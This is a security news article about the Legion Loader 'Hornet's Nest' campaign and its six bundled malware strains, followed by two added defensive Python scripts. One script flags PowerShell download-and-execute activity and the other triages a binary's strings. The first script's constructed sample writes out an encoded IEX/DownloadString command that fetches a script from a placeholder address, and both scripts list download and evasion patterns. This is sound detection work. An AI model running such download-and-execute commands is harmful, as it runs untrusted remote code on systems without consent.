Malware often arrives hand in hand with other malware. In a recently discovered campaign, a threat actor is attempting to infect as many machines as possible with a loader capable of dropping multiple malware strains. Researchers dubbed the campaign "Hornet's Nest" because a single infection delivers not one but six malware variants: a six-in-one attack. The campaign targets organizations in the U.S. and Europe, and the bundle includes three info-stealing trojans, a cryptocurrency stealer, a cryptocurrency miner, and a remote-access backdoor. The quantity and variety of malware planted in a single go is what earned the campaign its name, and it is what makes the newly discovered Legion Loader a serious threat: an organization that falls victim is facing several distinct compromises at once, researchers warn.
About the malware:
Researchers from Deep Instinct discovered this arsenal. The primary payload dropper, Legion Loader (the core of the "Hornet's Nest" campaign), is written in MS Visual C++ 8 and bears the signs of active modification. Its author is suspected to be a Russian speaker, as the code contains a few comments and UI strings written in Russian. Researchers at Deep Instinct said, "Such volume and variety are uncommon in the general landscape and are highly suggestive of a dropper-for-hire campaign." They also warn that, given its destructive attack strategy, it may be a threat designed especially for enterprises. The initial distribution method is currently unknown, but once Legion Loader is installed it runs a few PowerShell commands which in turn download the remaining payloads: three information-stealing trojans, a cryptocurrency stealer, a cryptocurrency miner, and an RDP backdoor.
Dissecting the six malware elements:
Vidar – Targets all sorts of personal information, including data stored in two-factor authentication (2FA) software.
Predator the Thief – Steals data and can capture images using the victim's webcam.
Raccoon Stealer – Steals passwords and cryptocurrency wallet credentials; reported to bypass Microsoft and Symantec anti-spam messaging gateways.
Crypto Stealer – A file-less, PowerShell-based cryptocurrency stealer that allows the attacker to steal from a victim's bitcoin wallet.
Crypto Miner – Abuses the victim's computer and its processing power to mine cryptocurrency for the attacker over a long period.
RDP Backdoor – Gives the attacker remote entry into the compromised machine, allowing further attacks to be launched at a later time.
Malware loaders, also called droppers, are generally defined as a type of trojan used to install or drop other varieties of malware. A well-known example is SmokeLoader, which was seen at the start of the year being used to distribute GandCrab and Vidar. Returning to Legion Loader: once executed, it runs PowerShell commands that retrieve its malicious payloads. The loader then delivers three different trojans, all of which are sold on underground forums. The first is Vidar, at its core an information stealer geared toward personal information. The second is Predator the Thief, also an information stealer, but one that can additionally capture images via the infected machine's webcam. The third is Raccoon Stealer, which steals passwords and cryptocurrency wallet credentials. Raccoon Stealer is widely regarded as easy to use and highly customizable, which adds to its appeal despite its relatively recent arrival on the malware scene. Researchers said that "Hornet's Nest" is a classic example of how less sophisticated malware can be a nightmare for any organization: it employs file-less techniques and delivers a bundle of follow-up malware ranging from info-stealers and credential harvesters to crypto-miners and backdoors.
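The behaviour described above (a freshly dropped executable launching PowerShell to fetch the follow-on payloads) is something a detection engineer can look for in process-creation telemetry. The script below is an added example for this article, not Deep Instinct's tooling and not anything from the campaign: it scores Sysmon Event ID 1-style records for a PowerShell child with download-and-execute primitives, decoding an -EncodedCommand payload so the indicators run against the real script rather than an opaque base64 blob. The four records, the parent path, the encoded command and the 198.51.100.7 address are constructed; the indicator weights and the threshold are assumptions to tune against your own telemetry.

```python
"""Score Windows process-creation telemetry for a dropper spawning PowerShell
to fetch follow-on payloads. Added example for this article, not code from
Deep Instinct or from the campaign. Field names follow Sysmon Event ID 1;
all records below are constructed, and the weights are assumptions."""
import base64
import re

PS_IMAGES = ("powershell.exe", "pwsh.exe")
# Parents running from user-writable locations are typical of a freshly
# downloaded dropper (assumed path list; extend it for your estate).
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads|Users\\Public|ProgramData)\\", re.I)
# Download-and-execute primitives, each with an assumed weight and a label.
INDICATORS = [
    (r"downloadstring|downloadfile|downloaddata", 3, "webclient-download"),
    (r"invoke-webrequest|\biwr\b|start-bitstransfer|bitsadmin", 3, "web-download"),
    (r"\biex\b|invoke-expression", 3, "in-memory-exec"),
    (r"-nop\b|-noprofile", 1, "no-profile"),
    (r"-w(indowstyle)?\s+hidden", 1, "hidden-window"),
    (r"-ep\s+bypass|-executionpolicy\s+bypass", 1, "policy-bypass"),
]
ENC_FLAG = re.compile(r"-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Return the script hidden behind -EncodedCommand (base64 of UTF-16LE), or ''."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(2), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""


def score_event(event):
    """Score one record; returns (score, reasons). Non-PowerShell images score 0."""
    if not event["Image"].lower().endswith(PS_IMAGES):
        return 0, []
    score, reasons = 0, []
    if USER_WRITABLE.search(event["ParentImage"]):
        score += 2
        reasons.append("parent-in-user-writable-dir")
    text = event["CommandLine"]
    decoded = decode_encoded_command(text)
    if decoded:
        score += 2
        reasons.append("encoded-command")
        # Swap the base64 blob for the decoded script so the indicators
        # below see the real payload rather than an opaque string.
        text = ENC_FLAG.sub(" ", text) + " " + decoded
    for pattern, weight, label in INDICATORS:
        if re.search(pattern, text, re.I):
            score += weight
            reasons.append(label)
    return score, reasons


def triage(events, threshold=6):
    """Return the records that reach the threshold, highest score first."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({"pid": ev["ProcessId"], "score": score, "reasons": reasons})
    return sorted(hits, key=lambda h: h["score"], reverse=True)


# Constructed sample: a stage-2 download of the kind the loader runs, wrapped
# the way Sysmon would log it. 198.51.100.7 is a documentation address.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/s1.ps1')"
ENCODED = base64.b64encode(STAGE2.encode("utf-16le")).decode("ascii")
SAMPLE_EVENTS = [
    {"ProcessId": 4412, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Users\bob\AppData\Local\Temp\setup_2019.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"ProcessId": 5120, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe Get-Service -Name Spooler"},
    {"ProcessId": 5304, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
    {"ProcessId": 5388, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Users\bob\AppData\Local\Temp\setup_2019.exe",
     "CommandLine": "notepad.exe readme.txt"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit)
```

Only the dropper-spawned record crosses the threshold; the admin's signed inventory script picks up a single point for the execution-policy bypass and stays below it, which is the kind of separation you want before wiring a rule like this into an alert.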
In a similar multi-trojan infection, researchers from Fortinet found a dropper sample that had been flagged as suspicious. On analysis, the new malware turned out to be capable of dropping both RevengeRAT and WSHRAT on systems running Windows.
The campaign isn't the most sophisticated one, but given the range of data that could be compromised, a multi-pronged attack of this kind can be a nightmare for an organization's security team, the researchers noted.
Nevertheless, organizations can employ basic security measures to avoid falling victim to malware of this kind: applying patches promptly and closing or protecting exposed ports goes a long way toward keeping the business running smoothly.
The hornet's nest buried within Legion Loader:
Legion Loader is a dropper: it exists to infect computers and install additional malware on them. Droppers aren't uncommon, but Legion Loader has a particularly nasty arsenal to play with and is designed to install two or three different hard-coded malware executables from its list of malicious code.
The Dropper – Legion Loader:
The dropper has, since our initial prevention events, garnered the name "Legion Loader" in various network-intrusion and emerging-threats rule-sets, a name we find to be very appropriate. Legion Loader is written in MS Visual C++ 8 (very likely by a Russian-speaking individual) and shows signs of being in active development. While Legion Loader features several VM/sandbox (VMware, VBOX, etc.) and research-tool evasions (common debuggers, SysInternals utilities, etc.), in many cases it lacks string obfuscation, which allows for fairly straightforward analysis. Every dropper in the campaign, which is simultaneously targeted at both the United States and Europe, is intended to deliver 2-3 additional malware executables and features a built-in file-less cryptocurrency stealer and browser-credential harvester. Once Legion Loader is running, it initially checks in with its designated C&C server (the servers are rotated frequently, alongside the distributed droppers) and will terminate unless it receives an expected response.
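The lack of string obfuscation mentioned above is exactly what makes a strings-level first pass worthwhile. The script below is an added example for this article, not Deep Instinct's tooling and not the loader's own code: it pulls ASCII and UTF-16LE strings out of a binary, groups them by the VM/sandbox, debugger, research-tool and check-in indicators the text lists, and separately surfaces Cyrillic UTF-16LE strings of the kind that pointed the researchers toward a Russian-speaking author. SAMPLE_BLOB is a constructed byte string rather than a real sample, the indicator lists are assumptions about what such evasion checks typically reference, and 198.51.100.7 is a documentation address.

```python
"""Strings-level triage of a loader sample that does not obfuscate its
strings. Added example for this article, not Deep Instinct's tooling;
SAMPLE_BLOB is constructed, not taken from a real binary, and the indicator
lists are assumptions about what such evasion checks typically reference."""
import re
from collections import defaultdict

MIN_LEN = 5
ASCII_RUN = re.compile(rb"[\x20-\x7e]{%d,}" % MIN_LEN)
# UTF-16LE text: a printable ASCII code unit followed by a NUL high byte.
WIDE_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % MIN_LEN)
# UTF-16LE code units in the Cyrillic block U+0400..U+04FF (high byte 0x04),
# which is how Russian comments or UI strings appear in a compiled binary.
CYRILLIC_RUN = re.compile(rb"(?:[\x00-\xff]\x04){%d,}" % MIN_LEN)

CATEGORIES = {
    "vm-sandbox": ("vmware", "vbox", "virtualbox", "qemu", "sbiedll", "sandboxie"),
    "debugger": ("ollydbg", "x64dbg", "x32dbg", "windbg", "idaq", "isdebuggerpresent"),
    "research-tools": ("procmon", "procexp", "autoruns", "tcpview", "wireshark", "fiddler"),
    "c2-checkin": ("http://", "https://", "user-agent", "winhttp", "internetopen"),
    "powershell-stage": ("powershell", "-enc", "downloadstring", "invoke-expression"),
}


def extract_strings(blob):
    """Yield (encoding, text) for every ASCII, UTF-16LE and Cyrillic UTF-16LE run."""
    for m in ASCII_RUN.finditer(blob):
        yield "ascii", m.group().decode("ascii")
    for m in WIDE_RUN.finditer(blob):
        yield "utf16", m.group().decode("utf-16le")
    for m in CYRILLIC_RUN.finditer(blob):
        yield "utf16-cyrillic", m.group().decode("utf-16le")


def classify(blob):
    """Map each indicator category to the sorted distinct strings that hit it."""
    hits = defaultdict(set)
    for enc, text in extract_strings(blob):
        low = text.lower()
        for cat, needles in CATEGORIES.items():
            if any(n in low for n in needles):
                hits[cat].add(text)
        if enc == "utf16-cyrillic":
            hits["cyrillic-text"].add(text)
    return {cat: sorted(v) for cat, v in hits.items()}


def looks_like_evasive_loader(hits):
    """Heuristic verdict: anti-analysis checks combined with a network
    check-in or a PowerShell staging command, the pairing the text describes."""
    evasion = any(c in hits for c in ("vm-sandbox", "debugger", "research-tools"))
    staging = any(c in hits for c in ("c2-checkin", "powershell-stage"))
    return evasion and staging


def _wide(s):
    return s.encode("utf-16le")


# Constructed sample. Items are separated by three NUL bytes so a narrow
# string never runs into the wide string that follows it.
SAMPLE_BLOB = b"\x00\x00\x00".join([
    b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff",
    b"VMware Virtual Platform",
    _wide("VBOX HARDDISK"),
    b"procmon.exe", b"ollydbg.exe", b"x64dbg.exe",
    _wide("IsDebuggerPresent"),
    b"http://198.51.100.7/gate.php",
    b"User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64)",
    _wide("\u0417\u0430\u0433\u0440\u0443\u0437\u043a\u0430"),  # Russian "Loading"
    b"powershell -nop -w hidden -enc",
    b"\x13\x37\x01\x02" * 4,
])

if __name__ == "__main__":
    found = classify(SAMPLE_BLOB)
    for cat, strings in found.items():
        print(f"{cat:16} {strings}")
    print("evasive loader:", looks_like_evasive_loader(found))
```

Point it at a real sample by reading the file into bytes and passing them to classify(); the separate UTF-16LE pass matters on Windows binaries because the wide strings (registry keys, window titles, Russian UI text) are exactly the ones a plain ASCII strings run misses.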